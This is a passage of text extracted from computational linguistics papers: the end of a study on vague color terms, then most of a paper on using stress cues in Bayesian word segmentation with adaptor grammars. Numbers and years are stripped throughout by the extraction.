in grounded meanings in a wide range of continu- ous domains—generalizing from color to quantity, scales, space and time—and pursuing a wide range of reasoning efforts, to corroborate our results and to leverage them in grounded language use. acknowledgments this work was supported in part by nsf dge- . this work has benefited from discus- sion and feedback from the reviewers of tacl, ma- neesh agrawala, david devault, jason eisner, tarek el-gaaly, katrin erk, vicky froyen, joshua gang, pernille hemmer, alex lascarides, and tim meo. references hirotugu akaike. . a new look at the statistical model identification. ieee transactions on automatic control, ( ): – . john r. anderson. . the adaptive nature of human categorization. psychological review, ( ): . jacob andreas and dan klein. . grounding lan- guage with points and paths in continuous spaces. in proceedings of the eighteenth conference on com- putational natural language learning, pages – , june. chris barker. . the dynamics of vagueness. lin- guistics and philosophy, ( ): – . brent berlin. . basic color terms: their univer- sality and evolution. univ of california press. susan e. brennan and herbert h. clark. . concep- tual pacts and lexical choice in conversation. journal of experimental psychology: learning, memory and cognition, ( ): – . stephen p. brooks and andrew gelman. . gen- eral methods for monitoring convergence of iterative simulations. journal of computational and graphical statistics, ( ): – . peter f. brown, vincent j. della pietra, robert l. mercer, stephen a. della pietra, and jennifer c. lai. . an estimate of an upper bound for the entropy of english. computational linguistics, ( ): – . elia bruni, gemma boleda, marco baroni, and nam- khanh tran. . distributional semantics in tech- nicolor. in proceedings of the th annual meeting of the association for computational linguistics, pages – . stanley f. chen and joshua goodman. . an empiri- cal study of smoothing techniques for language model- ing. in proceedings of the th annual meeting on as- sociation for computational linguistics, pages – . david l. chen and raymond j. mooney. . learning to sportscast: a test of grounded language acquisition. in icml ’ : proceedings of the th international conference on machine learning, pages – . siddhartha chib and edward greenberg. . un- derstanding the metropolis–hastings algorithm. the american statistician, ( ): – . jason chuang, maureen stone, and pat hanrahan. . a probabilistic model of the categorical association between colors. in color imaging conference, pages – . sam cumming. . coordination and content. philosophers’ imprint, ( ): – . colin r. dawson, jeremy wright, antons rebguns, marco valenzuela escárcega, daniel fried, and paul r. cohen. . a generative probabilis- tic framework for learning spatial language. in ieee third joint international conference on development and learning and epigenetic robotics (icdl), pages – . ieee. david devault, iris oved, and matthew stone. . so- cietal grounding is essential to meaningful language use. in proceedings of the twenty-first national con- ference on artificial intelligence, pages – . mark d. fairchild. . color appearance models. the wiley-is&t series in imaging science and tech- nology. wiley. delia graff fara. . shifting sands: an interest- relative theory of vagueness. philosophical topics, ( ): – . ali farhadi, ian endres, derek hoiem, and david forsyth. . describing objects by their attributes. ieee conference on computer vision and pat- tern recognition, pages – , june. george w. furnas, thomas k. landauer, louis m. gomez, and susan t. dumais. . the vocabulary problem in human-system communication. communi- cations of the acm, ( ): – . peter gärdenfors. . conceptual spaces. mit press. andrew gelman, gareth o. roberts, and walter r. gilks. . efficient metropolis jumping rules. in j. m. bernardo, j. o. berger, a. p. dawid, and a. f. smith, editors, bayesian statistics , pages – . oxford university press. herbert p. grice. . logic and conversation. in p. cole and j. morgan, editors, syntax and semantics iii: speech acts, pages – . academic press. stevan harnad. . the symbol grounding problem. physica d: nonlinear phenomena, ( – ): – . jeffrey heer and maureen stone. . color naming models for color selection, image editing and palette design. in proceedings of the sigchi conference on human factors in computing systems, pages – . john f. hughes, andries van dam, morgan mcguire, david f. sklar, james d. foley, steven k. feiner, and kurt akeley. . computer graphics: principles and practice ( rd edition). addison-wesley profes- sional. gerhard jäger. . natural color categories are con- vex sets. in maria aloni, harald bastiaanse, tikitu de jager, and katrin schulz, editors, logic, language and meaning - th amsterdam colloquium, amster- dam, the netherlands, december - , , re- vised selected papers, volume of lecture notes in computer science, pages – . springer. fred jelinek, robert l. mercer, lalit r. bahl, and james k. baker. . perplexity–a measure of the difficulty of speech recognition tasks. the journal of the acoustical society of america, :s . paul kay, brent berlin, luisa maffi, william r. merri- field, and richard cook. . the world color sur- vey. csli. emiel krahmer and kees van deemter. . compu- tational generation of referring expressions: a survey. computational linguistics, ( ): – . jayant krishnamurthy and thomas kollar. . jointly learning to parse and perceive: connecting natural lan- guage to the physical world. transactions of the asso- ciation for computational linguistics, ( ): – . alice kyburg and michael morreau. . fitting words: vague words in context. linguistics and phi- losophy, ( ): – . johan maurice gisele lammens. . a computational model of color perception and color naming. ph.d. thesis, suny buffalo. staffan larsson. . formal semantics for percep- tual classification. journal of logic and computa- tion. advance online publication. doi: . /log- com/ext . daniel lassiter. . vagueness as probabilistic lin- guistic knowledge. in rick nouwen, robert van rooij, uli sauerland, and hans-christian schmitz, editors, vagueness in communication - international workshop, vic , held as part of esslli , bordeaux, france, july - , . revised selected papers, volume of lecture notes in computer science, pages – . springer. david k. lewis. . convention: a philosophical study. harvard university press, cambridge, ma. cynthia matuszek, nicholas fitzgerald, luke zettle- moyer, liefeng bo, and dieter fox. . a joint model of language and perception for grounded at- tribute learning. in proceedings of the th interna- tional conference on machine learning (icml- ), pages – . http://dx.doi.org/ . /logcom/ext http://dx.doi.org/ . /logcom/ext nikolaos mavridis and deb roy. . grounded situation models for robots: where words and per- cepts meet. in intelligent robots and systems, ieee/rsj international conference on, pages – . ieee. timothy meo, brian mcmahan, and matthew stone. . generating and resolving vague color refer- ences. in semdial : the th workshop on the semantics and pragmatics of dialogue, pages – . nicholas metropolis, arianna w. rosenbluth, mar- shall n. rosenbluth, augusta h. teller, and edward teller. . equation of state calculations by fast computing machines. the journal of chemical physics, ( ): – . randall munroe. . color survey results. on- line at http://blog.xkcd.com/ / / /color-survey- results/. kimele persaud and pernille hemmer. . the in- fluence of knowledge and expectations for color on episodic memory. in p bello, m guarini, m mc- shane, and b scassellati, editors, proceedings of the th annual conference of the cognitive science so- ciety, pages – . terry regier, paul kay, and richard s. cook. . fo- cal colors are universal after all. proceedings of the national academy of sciences, : – . terry regier, paul kay, and naveen khetarpal. . color naming reflects optimal partitions of color space. proceedings of the national academy of sci- ences, : – . carina silberer, vittorio ferrari, and mirella lapata. . models of semantic representation with visual attributes. in proceedings of the st annual meet- ing of the association for computational linguistics, pages – . nathaniel j. smith, noah d. goodman, and michael c. frank. . learning and using language via recur- sive pragmatic reasoning about other agents. in ad- vances in neural information processing systems , pages – . stefanie tellex, thomas kollar, and steven dickerson. a. approaching the symbol grounding problem with probabilistic graphical models. ai magazine, ( ): – . stefanie tellex, thomas kollar, steven dickerson, matthew r walter, ashis gopal banerjee, seth j teller, and nicholas roy. b. understanding nat- ural language commands for robotic navigation and mobile manipulation. in proceedings of the twenty- fifth aaai conference on artificial intelligence, pages – . terry winograd. . procedures as a representation for data in a computer program for understanding nat- ural language. ph.d. thesis, mit. peter young, alice lai, micah hodosh, and julia hock- enmaier. . from image descriptions to visual denotations: new similarity metrics for semantic in- ference over event descriptions. transactions of the association for computational linguistics, : – . john m. zelle and raymond j. mooney. . learn- ing to parse database queries using inductive logic pro- gramming. in proceedings of the national conference on artificial intelligence, pages – . luke s. zettlemoyer and michael collins. . learn- ing to map sentences to logical form: structured clas- sification with probabilistic categorial grammars. in uai ’ , proceedings of the st conference in un- certainty in artificial intelligence, pages – . introduction related work using vague color terms: a model color categories semantic representation rational observer model learning experiment munroe color corpus fitting the model parameters model evaluation alternative models evaluation metrics decision-based metrics likelihood-based metrics evaluation results discussion and conclusion exploring the role of stress in bayesian word segmentation using adaptor grammars exploring the role of stress in bayesian word segmentation using adaptor grammars benjamin börschinger , mark johnson , department of computing, macquarie university, sydney, australia department of computational linguistics, heidelberg university, heidelberg, germany santa fe institute, santa fe, usa {benjamin.borschinger|mark.johnson}@mq.edu.au abstract stress has long been established as a major cue in word segmentation for english infants. we show that enabling a current state-of-the-art bayesian word segmentation model to take ad- vantage of stress cues noticeably improves its performance. we find that the improvements range from to %, depending on both the use of phonotactic cues and, to a lesser ex- tent, the amount of evidence available to the learner. we also find that in particular early on, stress cues are much more useful for our model than phonotactic cues by themselves, consistent with the finding that children do seem to use stress cues before they use phono- tactic cues. finally, we study how the model’s knowledge about stress patterns evolves over time. we not only find that our model cor- rectly acquires the most frequent patterns rel- atively quickly but also that the unique stress constraint that is at the heart of a previously proposed model does not need to be built in but can be acquired jointly with word segmen- tation. introduction among the first tasks a child language learner has to solve is picking out words from the fluent speech that constitutes its linguistic input. for english, stress has long been claimed to be a useful cue in infant word segmentation (jusczyk et al., ; jusczyk et al., b), following the demonstra- the datasets and software to replicate our experiments are available from http://web.science.mq.edu.au/ ˜bborschi/ tion of its effectiveness in adult speech process- ing (cutler et al., ). several studies have investigated the role of stress in word segmenta- tion using computational models, using both neu- ral network and “algebraic” (as opposed to “statis- tical”) approaches (christiansen et al., ; yang, ; lignos and yang, ; lignos, ; lig- nos, ). bayesian models of word segmenta- tion (brent, ; goldwater, ), however, have until recently completely ignored stress. the sole exception in this respect is doyle and levy ( ) who added stress cues to the bigram model (gold- water et al., ), demonstrating that this leads to an improvement in segmentation performance. in this paper, we extend their work and show how to integrate stress cues into the flexible adaptor gram- mar framework (johnson et al., ). this allows us to both start from a stronger baseline model and to investigate how the role of stress cues interacts with other aspects of the model. in particular, we find that phonotactic cues to word-boundaries inter- act with stress cues, indicating synergistic effects for small inputs and partial redundancy for larger in- puts. overall, we find that stress cues add roughly % token f-score to a model that does not account for phonotactics and % to a model that already in- corporates phonotactics. relatedly and in line with the finding that stress cues are used by infants be- fore phonotactic cues (jusczyk et al., a), we ob- serve that phonotactic cues require more input than stress cues to be used efficiently. a closer look at the knowledge acquired by our models shows that the unique stress constraint of yang ( ) can be acquired jointly with segmenting the input instead transactions of the association for computational linguistics, ( ) – . action editor: stefan riezler. submitted / ; published / . c© association for computational linguistics. of having to be pre-specified; and that our models correctly identify the predominant stress pattern of the input but underestimate the frequency of iambic words, which have been found to be missegmented by infant learners. the outline of the paper is as follows. in section we review prior work. in section we introduce our own models. in section we explain our experimen- tal evaluation and its results. section discusses our findings, and section concludes and provides some suggestions for future research. background and related work lexical stress is the “accentuation of syllables within words” (cutler, ) and has long been ar- gued to play an important role in adult word recog- nition. following cutler and carter ( )’s obser- vation that stressed syllables tend to occur at the be- ginnings of words in english, jusczyk et al. ( ) investigated whether infants acquiring english take advantage of this fact. their study demonstrated that this is indeed the case for month olds, al- though they found no indication of using stressed syllables as cues for word boundaries in month olds. their findings have been replicated and ex- tended in subsequent work (jusczyk et al., b; thiessen and saffran, ; curtin et al., ; thiessen and saffran, ). a brief summary of the key findings is as follows: english infants treat stressed syllables as cues for the beginnings of words from roughly months of age, suggesting that the role played by stress needs to be acquired, and that this requires antecedent segmentation by non- stress-based means (thiessen and saffran, ). they also exhibit a preference for low-pass filtered stress-initial words from this age, suggesting that it is indeed stress and not other phonetic or phono- tactic properties that are treated as a cue for word- beginnings (jusczyk et al., ). in fact, phontactic cues seem to be used later than stress cues (jusczyk et al., a) and seem to be outweighed by stress cues (mattys and jusczyk, ). the earliest computational model for word seg- mentation incorporating stress cues we are aware of is the recurrent network model of christiansen et al. ( ) and christiansen and curtin ( ). they only reported a word-token f-score of % (roughly, segmentation accuracy: see section ), which is considerably below the performance of subsequent models, making a direct comparison complicated. yang ( ) introduced a simple incremental algo- rithm that relies on stress by embodying a unique stress constraint (usc) that allows at most a sin- gle stressed syllable per word. on pre-syllabified child directed speech, he reported a word token f- score of . % for a non-statistical algorithm that exploits the usc. while the usc has been argued to be near-to-universal and follows from the “cul- minative function of stress” (fromkin, ; cutler, ), the high score yang reported crucially de- pends on every word token carrying stress, including function words. more recently, lignos ( , , ) further explored yang’s original algorithm, taking into account that function words should not be assumed to possess lexical stress cues. while his scores are in line with those reported by yang, the importance of stress for this learner were more modest, providing a gain of around . % (lignos, ). also, the yang/lignos learner is unable to acquire knowledge about the role stress plays in the language, e.g. that stress tends to fall on particular positions within words. doyle and levy ( ) extend the bigram model of goldwater et al. ( ) by adding stress- templates to the lexical generator. a stress-template indicates how many syllables the word has, and which of these syllables (if any) are stressed. this allows the model to acquire knowledge about the stress patterns of its input by assigning different probabilities to the different stress-templates. how- ever, doyle and levy ( ) do not directly exam- ine the probabilities assigned to the stress-templates; they only report that their model does slightly prefer stress-initial words over the baseline model by cal- culating the fraction of stress-initial word types in the output segmentations of their models. they also demonstrate that stress cues do indeed aid segmen- tation, although their reported gain of % in token f-score is even smaller than that reported by lig- nos ( ). our own approach differs from theirs in assuming phonemic rather than pre-syllabified in- put (although our model could, trivially, be run on syllabified input as well) and makes use of adap- tor grammars instead of the goldwater et al. ( ) bigram model, providing us with a flexible frame- work for exploring the usefulness of stress in differ- ent models. adaptor grammar (johnson et al., ) is a grammar-based formalism for specifying non- parametric hierarchical models. previous work ex- plored the usefulness of, for example, syllable- structure (johnson, b; johnson and goldwa- ter, ) or morphology (johnson, b; johnson, a) in word segmentation. the closest work to our own is johnson and demuth ( ) who investi- gate the usefulness of tones for mandarin phonemic segmentation. their way of adding tones to a model of word segmentation is very similar to our way of incorporating stress. models we give an intuitive description of the mathemati- cal background of adaptor grammars in . , refer- ring the reader to johnson et al. ( ) for technical details. the models we examine are derived from the collocational model of johnson and goldwater ( ) by varying three parameters, resulting in models: two baselines that do not take advantage of stress cues and either do or do not use phonotactics, as described in section . ; and four stress models that differ with respect to the use of phonotactics, and as to whether they embody the unique stress constraint introduced by yang ( ). we describe these models in section . . . adaptor grammars briefly, an adaptor grammar (ag) can be seen as a probabilistic context-free grammar (pcfg) with a special set of adapted non-terminals. we use un- derlining to distinguish adapted non-terminals ( x ) from non-adapted non-terminals ( y ). the distri- bution for each adapted non-terminal x is drawn from a pitman-yor process which takes as its base- distribution the tree-distribution over trees rooted in x as defined by the pcfg. as an effect, each adapted non-terminal can be seen as having associ- ated with it a cache of previously-generated subtrees that can be reused without having to be regenerated using the individual pcfg rules. this allows ags to learn reusable sub-trees such as words, sequences of words, or smaller units such as onsets and codas. thus, while ordinary pcfgs have a finite number of parameters (one probability for each rule), adap- tor grammars in addition have a parameter for every possible complete tree rooted in any of its adapted non-terminals, leading to a potentially infinite num- ber of such parameters. the pitman-yor process in- duces a rich-get-richer dynamics, biasing the model towards identifying a small set of units that can be reused as often as possible. in the case of word seg- mentation, the model will try to identify as compact a lexicon as possible to segment the unsegmented input. . baseline models our starting point is the state-of-the-art ag model for word segmentation, johnson and goldwater ( )’s colloc -syll model, reproduced in fig- ure . the model assumes that words are grouped into larger collocational units that themselves can be grouped into even larger collocational units. this accounts for the fact that in natural language, there are strong word-to-word dependencies that need to be accounted for if severe undersegmentations of the form “is in the” are to be avoided (goldwater, ; johnson and goldwater, ; börschinger et al., ). it also uses a language-independent form of syllable structure to constrain the space of possi- ble words. finally, this model can learn word-initial onsets and word-final codas. in a language like en- glish, this ability provides additional cues to word- boundaries as certain onsets are much more likely to occur word-initially than medially (e.g. “bl” in “black”), and analogously for certain codas (e.g. “dth” in “width” or “ngth” in “strength”). we define an additional baseline model by replac- ing rules ( ) and ( ) by ( ), and deleting rules ( ) to ( ). this removes the model’s ability to use phono- tactic cues to word-boundaries. word → syll ( syll ) ( syll ) ( syll ) ( ) we refer to the model in figure as the colloc - phon model, and the model that results from sub- stituting and removing rules as described as the colloc -nophon model. alternatively, one could limit the models ability to capture word-to-word de- pendencies by removing rules ( ) to ( ). this results we follow johnson and goldwater ( ) in limiting the length of possible words to four syllables to speed up runtime. in pilot experiments, this choice did not have a noticeable effect on segmentation performance. collocations → collocation + ( ) collocation → collocation + ( ) collocation → collocation + ( ) collocation → word + ( ) word → syllif ( ) word → sylli ( syll ) ( syll ) syllf ( ) syllif → ( onseti ) rhymef ( ) sylli → ( onseti ) rhyme ( ) syllf → ( onset ) rhymef ( ) codaf → consonant + ( ) rhymef → vowel ( codaf ) ( ) onseti → consonant + ( ) syll → ( onset ) rhyme ( ) rhyme → vowel ( coda ) ( ) onset → consonant + ( ) coda → consonant + ( ) figure : the baseline model. we use regular-expression notation to abbreviate multiple rules. x{n} stands for up to n repetitions of x , brackets indicate optionality, and x + stands for one or more repetitions of x . x indicates an adapted non-terminal. rules that introduce terminals for the pre-terminals vowel , consonant are omitted. refer to the main text for an explanation of the grammar. in the colloc-model (johnson, b) that has previ- ously been found to behave similarly to the bigram model used in doyle and levy ( ) (johnson, b; börschinger et al., ). we performed ex- periments with the colloc-model as well and found similar results to doyle and levy ( ) which are, while overall worse, similar in trend to the results obtained for the colloc -models. for the rest of the paper, therefore, we will focus on variants of the colloc -model. . stress-based models in order for stress cues to be helpful, the model must have some way of associating the position of stress with word-boundaries. intuitively, the reason stress helps infants in segmenting english is that a stressed syllable is a reliable indicator of the beginning of a word (jusczyk et al., ). more generally, if there is a (reasonably) reliable relationship between the position of stressed syllables and beginnings (or word →{ssyll | usyll}{ , } ( ) ssyll → ( onset ) rhymes ( ) usyll → ( onset ) rhymeu ( ) rhymes → vowel ∗( coda ) ( ) rhymeu → vowel ( coda ) ( ) onset → consonant + ( ) coda → consonant + ( ) figure : description of the all-stress-patterns model. we use x{m,n} for “at least m and at most n repetitions of x ” and {x | y} for “either x or y ”. stress is asso- ciated with a vowel by suffixing it with the special termi- nal symbol ∗ , leading to a distinction between stressed ( ssyll ) and unstressed ( usyll ) syllables. a word can consist of any possible sequence of up to four syllables, as indicated by the regular-expression notation. by ad- ditionally adding initial and final variants of ssyll and usyll as in figure , phonotactics can be combined with stress cues. endings) of words, a learner might exploit this rela- tionship. in a bayesian model, this intuition can be captured by modifying the lexical generator, that is, the distribution that generates word s. here, changing the lexical generator corresponds to modifying the rules expanding word . a straight- forward way to modify it accordingly is to enu- merate all possible sequences of stressed and un- stressed syllables. a lexical generator like this is given in figure . in the data, stress cues are rep- resented using a special terminal “∗” that follows a stressed vowel, as illustrated in figure . in the grammar, “∗” is constrained to only surface follow- ing a vowel , rendering a syllable in which it occurs stressed ( ssyll ). syllables that do not contain a “∗” are considered unstressed ( usyll ). by performing inference for the probabilities assigned to the dif- ferent expansions of rule ( ), our models can, for example, learn that a bi-syllabic word that is stress- initial (a trochee) is more probable than one that puts stress on the second syllable (an iamb). this (partly) captures the tendency of english for stress-initial words and thus provide an additional cue for identi- fying words; and it is exactly the kind of preference infant learners of english seem to acquire (jusczyk this is, in essence, also the strategy chosen by doyle and levy ( ). grammar phon stress usc colloc -nophon colloc -phon • colloc -nophon-stress • colloc -phon-stress • • colloc -nophon-stress-usc • • colloc -phon-stress-usc • • • table : the different models used in our experiments. “phon” indicates whether phonotactics are used, “stress” whether stress cues are used and “usc” whether the unique stress constraint is assumed. orthographic the do-gie no-stress dh ah d ao g iy stress dh ah d ao * g iy figure : illustration of the input-representation we choose. we indicate primary stress according to the dic- tionary with bold-face in the orthography. the phonemic transcription uses arpabet and is produced using an extended version of cmudict. primary stress is indi- cated by inserting the special symbol “*” after the vowel of a stressed syllable. et al., ). we can combine this lexical generator with the colloc -nophon baseline, resulting in the colloc - nophon-stress model. we can also add phonotac- tics to the lexical generator in figure by adding initial and final variants of ssyll and usyll , anal- ogous to rules ( ) to ( ) in figure . this yields the colloc -phon-stress model. we can also add the unique stress constraint (usc) (yang, ) by excluding all variants of rule ( ) that generate two or more stressed syllables. for example, while the lexical generator for the colloc -nophon-stress model will include the rule word → ssyll ssyll , the lexical generator embodying the usc lacks this rule. we refer to the models that include the usc as colloc -nophon-stress-usc and colloc -phon-stress- usc models. a compact overview of the six different models is given in table . experiments we evaluate our models on several corpora of child directed speech. we first describe the corpora we used, then the experimental methodology employed and finally the experimental results. as the trend is comparable across all corpora, we only discuss in detail results obtained on the alex corpus. for com- pleteness, however, table reports the “standard” evaluation of performing inference over all of the three corpora. . corpora and corpus creation following christiansen et al. ( ) and doyle and levy ( ), we use the korman corpus (korman, ) as one of our corpora. it comprises child- directed speech for very young infants, aged be- tween and weeks and, like all other cor- pora used in this paper, is available through the childes database (macwhinney, ). we de- rive a phonemicized version of the corpus using an extended version of cmudict (carnegie mellon university, ) , as we were unable to obtain the stress-annotated version of this corpus used in previ- ous experiments. the phonemicized version is pro- duced by replacing each orthographic word in the transcript with the first pronunciation given by the dictionary. cmudict also annotates lexical stress, and we use this information to add stress cues to the corpus. we only code primary lexical stresses in the input, ignoring secondary stresses in line with ex- perimental work that indicates that human listeners are capable of reliably distinguishing primary and secondary stress (mattys, ). due to the very low frequency of words with or more syllables in these corpora, this choice has very little effect on the number of stress cues available in the input. our ver- sion of the korman corpus contains, in total, utterances. unlike christiansen et al. ( ), yang ( ), and doyle and levy ( ), we follow lig- nos and yang ( ) in making the more realistic as- sumption that the mono-syllabic function words listed by selkirk ( ) never surface with lexical stress. as function words account for roughly % of the tokens but only roughly % of the types in our corpora, this means that the type and token distribu- tion of stress patterns differs dramatically in all our corpora, as can be seen from table . we also added stress information to the brent- bernstein-ratner corpus (bernstein-ratner, ; brent, ), following the procedure just out- lined. this corpus is a de-facto standard for evaluat- http://svn.code.sf.net/p/cmusphinx/ code/trunk/cmudict/cmudict. . a pattern brent korman alex tok typ tok typ tok typ w+ . . . . . . sw∗ . . . . . . wsw∗ . . . . . . other . . . . . . table : relative frequencies for stress patterns for the corpora used in our study. x∗ stands for or more, x+ for one or more repetitions of x, and s for a stressed and w for an unstressed syllable. note the stark asymmetry between type and token frequencies for unstressed words. up to two-decimal places, patterns other than the ones given have relative frequency . (frequencies might not sum to as an artefact of rounding to decimal places). ing models of bayesian word segmentation (brent, ; goldwater, ; goldwater et al., ; johnson and goldwater, ), comprising in total utterances. as our third corpus, we use the alex portion of the providence corpus (demuth et al., ; börschinger et al., ). a major benefit of the providence corpus is that the video-recordings from which the transcripts were produced are available through childes alongside the transcripts. this will allow future work to rely on even more realis- tic stress cues that can be derived directly from the acoustic signal. while beyond the scope of this pa- per, we believe choosing a corpus that makes richer information available will be important for future work on stress (and other acoustic) cues. another major benefit of the alex corpus is that it provides longitudinal data for a single infant, rather than be- ing a concatenation of transcripts collected from multiple children, such as the korman and the brent- bernstein-ratner corpus. in total, the alex corpus comprises utterances. note that despite the differences in age of the in- fants and overall make-up of the corpora, the dis- tribution of stress patterns across the corpora is roughly the same, as shown by table for the first , utterances of each of the corpora. this sug- gests that the distribution of stress patterns both at a token and type level is a robust property of english child-directed speech. . evaluation procedure the aim of our experiments is to understand the contribution of stress cues to the bayesian word segmentation models described in section . to get an idea of how input size interacts with this, we look at prefixes of the corpora with increasing sizes ( , , , , , , and , utterances). in addition, we are interested in under- standing what kind of stress pattern preferences our models acquire. for this, we also collect samples of the probabilities assigned to the different expansions of rule ( ), allowing us to examine this directly. the standard evaluation of segmentation models in- volves having them segment their input in an un- supervised manner and evaluating performance on how well they segmented that input. we addition- ally evaluate the models on a test set for each cor- pus. use of a separate test set has previously been suggested as a means of testing how well the knowl- edge a learner acquired generalizes to novel utter- ances (pearl et al., ), and is required for the kind of comparison across different sizes of input we are interested in to determine whether there the role of stress cues interacts with the input size. we create the test-sets by taking the final ut- terances for each corpus. these utterances will be segmented by the model after it has performed inference on its input, without making any further changes to the lexicon that the model has induced. in other words, the model will have to segment each of the test utterances using only the lexicon (and any additional knowledge about co-occurrences, phono- tactics, and stress) it has acquired from the training portion of the corpus during inference. we measure segmentation performance using the standard metric of token f-score (brent, ) which is the harmonic mean of token precision and recall. token f-score provides an overall impression of how accurate individual word tokens were identified. to illustrate, if the gold segmentation is “the dog”, the segmentation “th e dog” has a token precision of (one out of three predicted words is correct); a token recall of (one of the two gold words was correctly identified); and a token f-score of . . . inference for inference, we closely follow johnson and gold- water ( ): we put vague priors on all the hyper- p s usc alex korman brent train test train test train test . . . . . . • . . . . . . • . . . . . . • • . . . . . . • • . . . . . . • • • . . . . . . table : token f-scores on both train and test portions for all three corpora when inference is performed over the full corpus. note that the benefit of stress is clearer when evaluating on the test set, and that overall, perfor- mance of the different models is comparable across all three corpora. models are coded according to the key in table . parameters of our models and run chains for iterations, collecting samples from each chain with a lag of iterations between each sample af- ter a burn-in of iterations, using both batch- initialization and table-label resampling to ensure good convergence of the sampler. we construct a single segmentation from the posterior samples us- ing their minimum bayes risk decoding, providing a single score for each condition. . experimental conditions each of our six models is evaluated on inputs of in- creasing size, starting at and ending at , utterances, allowing us to investigate both how per- formance and “knowledge” of the learner varies as a function of input size. for completeness, we also report the “standard” evaluation, i.e. performance of our models on all corpora when trained on the entire input in table . we will focus our discussion on the results obtained on the alex corpus, which are de- picted in figure , where the input size is depicted on the x-axis, and the segmentation f-score for the test-set on the y-axis. discussion we find a clear improvement for the stress-models over both the colloc -nophon and the colloc -phon models. as can be seen in table , the overall trend is the same for all three corpora, both when evaluating on the input and the separate test-set. we performed wilcox rank sum tests on the individual scores of the independent chains for each model on the full training data sets and found that the stress-models were always note how the relative gain for stress is roughly % higher when evaluating on the test-set; this might have to do with jusczyk ( )’s observa- tion that the advantage of stress “might be more evident for relatively unexpected or unfamiliarized strings” (jusczyk, ). a closer look at figure indicates further interesting differences between the colloc -nophon and the colloc -phon models that only become evident when considering different in- put sizes. . stress cues without phonotactics for the colloc -nophon models, we observe a rel- atively stable improvement by adding stress cues of - %, irrespective of input size and whether or not the unique stress constraint (usc) is assumed. the sole exception to this occurs when the learner only gets to see utterances: in this case, the colloc-nophon-stress model only shows a % im- provement, whereas the colloc -nophon-stress-usc model obtains a boost of roughly %. noticeable consistent differences between the colloc -nophon- stress and colloc -nophon-stress-usc model, how- ever, all but disappear starting from around ut- terances. this is somewhat surprising, considering that it is the usc that was argued by yang ( ) to be key for taking advantage of stress. we take this behaviour to indicate that even with as little evidence as to utterances, a bayesian ideal learner can effectively infer that something like the usc is true of english. this also becomes clear when examining how the learn- ers’ preferences for different stress patterns evolve over time, as we do in section . below. . stress cues and phonotactics overall, the models including phonotactic cues per- form better than those that do not rely on phono- tactics. however, the overall gain contributed by stress to the colloc -phon baseline is smaller, al- significantly more accurate (p < . ) than the baseline models except when evaluating on the training data for the korman and brent corpora. on data in which function words are marked for stress (as in yang ( ) and doyle and levy ( )), the usc yields ex- tremely high scores across all models, simply because roughly every second word is a function word. given that this assump- tion is extremely unnatural, we do not take this as an argument for the usc. . . . . . number of input utterances se g m e n ta tio n f − sc o re colloc −nophon colloc −phon colloc −nophon−stress colloc −phon−stress colloc −nophon−stress−usc colloc −phon−stress−usc figure : segmentation performance of the different models, across different input sizes and as evaluated on the test-set for the alex corpus. the no-stress baselines are given in red, the stress-models without the unique stress constraint (usc) in green and the ones including the usc in black. solid lines indicate models that use, dashed lines models that do not use phonotactics. refer to the text for discussion. though this seems to depend on the size of the input. while phonotactics by itself appears to be a pow- erful cue, yielding a noticeable - % improvement over the colloc -nophon baseline, the learner seems to require at least around utterances before the colloc -phon model becomes clearly more accurate than the colloc -nophon model. in contrast, even for only utterances stress cues by themselves provide a % improvement to the colloc -nophon model, indicating that they can be taken advantage of earlier. while the number of utterances processed by a bayesian ideal learner is not directly related to developmental stages, this observation is consistent with the psycholinguists’ claim that phonotactics are used by infants for word segmentation after they have begun to use stress for segmentation (jusczyk et al., a). turning to the interaction between stress and phonotactics, we see that there is no consistent ad- vantage of including the usc in the model. this is, in fact, even clearer than for the colloc -nophon model where at least for small inputs of size , the usc added almost % in performance. for the colloc -phon models, we only observe a - % im- provement by adding the usc up until utter- ances. this further strengthens the point that even in the absence of such an innate constraint, a statisti- cal learner can take advantage of stress cues and, as we show below, actually acquire something like the usc from the input. the % difference between the colloc -phon- stress / colloc -phon-stress-usc models to the colloc -phon baseline is smaller than the % dif- ference between the colloc -nophon and colloc - nophon-stress models. this shows that there is a redundancy between phonotactic and stress cues in large amounts of data, as their joint contribution to the colloc -nophon baseline is less than the sum of their individual contributions at , utterances, of % (for phonotactics) and % (for stress). unlike for the colloc -nophon models, we also see a clear impact of input size. in particular, at utterances the addition of stress cues leads to an – % improvement, depending on whether or not the usc is assumed, whereas for the colloc - nophon model we only observed a – % improve- ment. this is particularly striking when we con- sider that by themselves, the phonotactic cues only contribute a % improvement to the colloc -nophon baseline when trained on the utterance corpus, indicating a synergistic interaction (rather than re- dundancy) between phonotactics and stress for small inputs. this effect disappears starting from around utterances; for inputs of size and larger, the net-gain of stress drops from roughly % to a – % improvement. that is, while we did not notice any relationship between input size and impact of stress cues for the colloc -nophon model, we do see such an interaction for the combination of phonotac- tics and stress cues which, taken together, lead to a larger relative gain in performance on smaller inputs than on large ones. . acquisition of stress patterns in addition to acquiring a lexicon, the bayesian learner acquires knowledge about the possible stress patterns of english words. the fact that this knowl- edge is explicitly represented through the pcfg rules and their probabilities that define the lexi- cal generator allows us to study the generalisations about stress the model actually acquires. while doyle and levy ( ) suggest carrying out such an analysis, they restrict themselves to estimating the fraction of stress patterns in the segmented out- put. as shown in table , however, the type and token distributions of stress patterns can differ sub- stantially. we therefore investigate the stress pref- erences acquired by our learner by examining the probabilities assigned to the different expansions of rule ( ), aggregating the probabilities of the indi- vidual rules into patterns. for example, the rules word → ssyll ( usyll ){ , } correspond to the pattern “stress on the first syllable”, whereas the rules word → usyll{ , } correspond to the pat- tern “unstressed word”. by computing the respec- tive probabilities, we get the overall probability as- signed by a learner to the pattern. figure provides this information for several dif- ferent rule patterns. additionally, these plots in- clude the empirical type (red dotted) and token pro- portions (red double-dashed) for the input corpus. note how for the two major patterns, all models suc- cessfully track the type, rather than the token fre- quency, correctly developing a preference for stress- initial over unstressed words, despite the compa- rable token frequency of these two patterns. this is compatible with a recent proposal by thiessen and saffran ( ), who argue that infants infer the stress pattern over their lexicon. for a bayesian model such as ours or goldwater et al. ( )’s, there is no need to pre-specify that the distribution ought to be learned over types rather than tokens, as the models automatically interpolate between type and token statistics according to the properties of their input (goldwater et al., ). in addition, a bayesian framework provides a simple answer to the question of how a learner might identify the role of stress in its language without already having ac- quired at least some words. by combining differ- ent kinds of cues, e.g. distributional, phonotactic and prosodic, in a principled manner a bayesian learner can jointly segment its input and learn the appropriate role of each cue, without having to pre- specify specific preferences that might differ across languages. the iambic rule pattern that puts stress on the sec- ond syllable is much more infrequent on a token level. all models track this low token frequency, underestimating the type frequency of this pattern by a fair amount. this suggests that learning this pattern correctly requires 